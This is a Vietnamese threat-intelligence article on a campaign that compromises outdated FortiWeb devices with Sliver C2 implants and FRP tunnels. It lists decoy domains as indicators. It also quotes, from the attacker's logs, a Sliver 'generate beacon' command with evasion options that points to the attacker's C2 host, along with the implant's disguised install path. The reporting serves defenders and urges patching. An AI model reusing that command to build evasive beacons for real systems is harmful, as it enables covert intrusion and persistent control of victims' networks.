Phát hiện gần đây cho thấy một tác nhân đe dọa tinh vi đang tích cực tiến hành khai thác lỗ hổng FortiWeb trên nhiều thiết bị FortiWeb đã lỗi thời. Mục tiêu của chiến dịch này là triển khai framework Điều khiển và Chỉ huy (C2) **Sliver C2**.
Chiến dịch này phản ánh một xu hướng đáng lo ngại, khi các đối thủ tận dụng công cụ tấn công mã nguồn mở để duy trì quyền truy cập dai dẳng trong các mạng bị xâm nhập. Phương thức này thường giúp chúng vượt qua các hệ thống phòng thủ an ninh truyền thống.
Tổng quan về Chiến dịch Khai thác FortiWeb
Kẻ tấn công ưu tiên các thiết bị biên chưa được vá lỗi và công khai trên internet. Các thiết bị này bị biến thành điểm truy cập ổn định để xâm nhập sâu hơn vào mạng.
Quá trình lây nhiễm chủ yếu liên quan đến việc khai thác lỗ hổng FortiWeb công khai trên các thiết bị, đặc biệt nhắm vào các phiên bản firmware từ 5.4.202 đến 6.1.62.
Các Lỗ hổng Bị Khai thác
Mặc dù lỗ hổng chính xác được sử dụng để thỏa hiệp FortiWeb vẫn chưa được xác nhận, nhóm này cũng được quan sát là đã tận dụng React2Shell (CVE-2025-55182) trong các hoạt động song song.
Phương thức Duy trì Quyền truy cập và Xâm nhập
Sau khi thiết lập quyền truy cập ban đầu, kẻ tấn công triển khai công cụ Fast Reverse Proxy (FRP) để phơi bày các dịch vụ cục bộ. Điều này tạo ra một cầu nối trực tiếp giữa mạng nội bộ của nạn nhân và hệ thống kiểm soát bên ngoài của kẻ tấn công.
Phát hiện và Phân tích Hạ tầng Kẻ tấn công
Hoạt động Phát hiện của Ctrl-Alt-Int3l
Trong quá trình săn lùng mối đe dọa mạng định kỳ trên Censys, các nhà phân tích của Ctrl-Alt-Int3l đã xác định được hạ tầng độc hại này. Việc phát hiện diễn ra sau khi tìm thấy các cơ sở dữ liệu và nhật ký Sliver C2 bị lộ. Thông tin chi tiết có thể được tìm thấy tại Ctrl-Alt-Int3l Threat Research.
Những tài sản bị phơi bày này cung cấp cái nhìn hiếm hoi về các phương pháp hoạt động của kẻ tấn công, tiết lộ một cụm thiết bị bị xâm nhập đang beacon về các máy chủ điều khiển tập trung.
Cuộc điều tra đã xác nhận rằng phần lớn các máy chủ nạn nhân đang chạy firmware lỗi thời. Điều này khiến chúng trở nên rất dễ bị tổn thương trước chiến dịch mang tính cơ hội nhưng có chủ đích này. Đây là minh chứng cho tầm quan trọng của việc duy trì các bản vá bảo mật mới nhất.
Tác động Hoạt động và Khả năng Kiểm soát
Tác động hoạt động của cuộc tấn công là nghiêm trọng, vì nó cấp cho tác nhân đe dọa khả năng duy trì quyền kiểm soát lâu dài trên các thiết bị bảo mật quan trọng. Các thiết bị này thường được tin cậy trong mạng.
Bằng cách nhúng implant **Sliver C2** trực tiếp vào tường lửa, kẻ tấn công có khả năng giám sát lưu lượng và thực thi các lệnh đặc quyền. Đây là một phương pháp hiệu quả để duy trì sự hiện diện và kiểm soát sâu rộng sau khi khai thác lỗ hổng FortiWeb thành công.
Hạ tầng Điều khiển và Chỉ huy (C2)
Chiến dịch cũng thể hiện sự tập trung chiến lược, với các chỉ số cụ thể cho thấy các mục tiêu ở Nam Á, được chứng minh bởi hạ tầng mồi nhử (decoy infrastructure) được thiết kế cẩn thận.
Hạ tầng của tác nhân đe dọa được xây dựng xung quanh các tên miền mồi nhử được thiết kế để bắt chước các dịch vụ hợp pháp.
Các Chỉ số Thỏa hiệp (IOC) và Tên miền Giả mạo
Phân tích cấu hình Sliver C2 đã tiết lộ các tên miền sau:
ns1.ubunutpackages[.]storens1.bafairforce[.]army
Các tên miền này lưu trữ nội dung giả mạo, bao gồm một kho lưu trữ “Ubuntu Packages” và một trang tuyển dụng “Bangladesh Airforce”. Mục đích là để đánh lừa các nhà phòng thủ mạng và ẩn mình trong lưu lượng hợp pháp, làm tăng thêm sự phức tạp của mối đe dọa mạng này.
Tạo Payload và Lệnh Sliver C2
Kẻ tấn công đã sử dụng các lệnh Sliver C2 cụ thể để tạo payload với khả năng né tránh. Lệnh sau đã được lấy từ nhật ký:
generate beacon --http ns1.ubunutpackages.store --reconnect 120 --strategy r \
--template ubuntu --os linux --evasion --save ./system-updater --seconds 60Cấu hình này đặt beacon để kết nối lại mỗi 120 giây và sử dụng template “ubuntu” để hòa mình vào các tiến trình Linux. Lệnh này là ví dụ điển hình về cách các tác nhân sử dụng công cụ mã nguồn mở để tùy chỉnh payload cho mục đích khai thác lỗ hổng FortiWeb và duy trì quyền truy cập.
Binary được tạo ra đã được triển khai tới /bin/.root/system-updater trên các thiết bị FortiWeb bị xâm nhập. Nó tiếp tục giả mạo như một tiện ích cập nhật hệ thống, gây khó khăn cho việc phát hiện và phản ứng.
Tình hình này nhấn mạnh tầm quan trọng của việc thường xuyên kiểm tra và cập nhật bản vá bảo mật cho các thiết bị biên, đặc biệt là các thiết bị FortiWeb. Việc không thực hiện có thể dẫn đến việc khai thác lỗ hổng FortiWeb và gây ra những hậu quả nghiêm trọng cho hệ thống an ninh mạng.
